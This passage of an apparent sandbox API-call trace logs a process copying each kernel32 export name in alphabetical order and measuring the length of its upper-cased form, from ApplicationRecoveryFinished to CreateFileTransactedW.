lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.166] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.166] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.166] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.166] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.166] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.166] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.166] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.166] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.166] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.166] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.166] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.166] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.166] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.167] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.167] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.167] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.167] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.167] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.167] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.167] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.167] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.167] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.167] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.167] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.167] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.167] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.167] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.167] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.167] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.167] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.167] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.167] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.168] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.168] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.168] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.168] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.168] lstrlenA (lpString="BEEP") returned 4 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.168] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.168] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.168] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.168] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.168] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.168] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.168] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.168] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.168] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.168] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.168] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.168] lstrlenA (lpString="CANCELIO") returned 8 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.168] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.168] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.169] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.169] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.169] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.169] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.169] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.169] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.169] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.169] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.169] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.169] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.169] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.169] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.169] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.169] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.169] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.169] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.169] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.169] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.170] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.170] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.170] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.170] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.170] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.170] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.170] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.170] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.170] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.170] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.170] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.170] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.170] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.170] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.170] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.170] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.171] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.171] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.171] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.171] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.171] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.171] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.171] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.171] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.171] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.171] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.171] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.171] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.171] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.171] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.171] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.171] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.171] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.171] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.171] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.172] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.172] lstrlenA (lpString="COPYFILEA") returned 9 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.172] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.172] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.172] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.172] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.172] lstrlenA (lpString="COPYFILEW") returned 9 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.172] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.172] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.172] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.172] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.172] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.172] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.172] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.172] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.172] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.172] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.172] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.172] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.172] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.173] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.173] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.173] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.173] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.173] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.173] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.173] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.173] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.173] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.173] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.173] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.173] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.173] lstrlenA 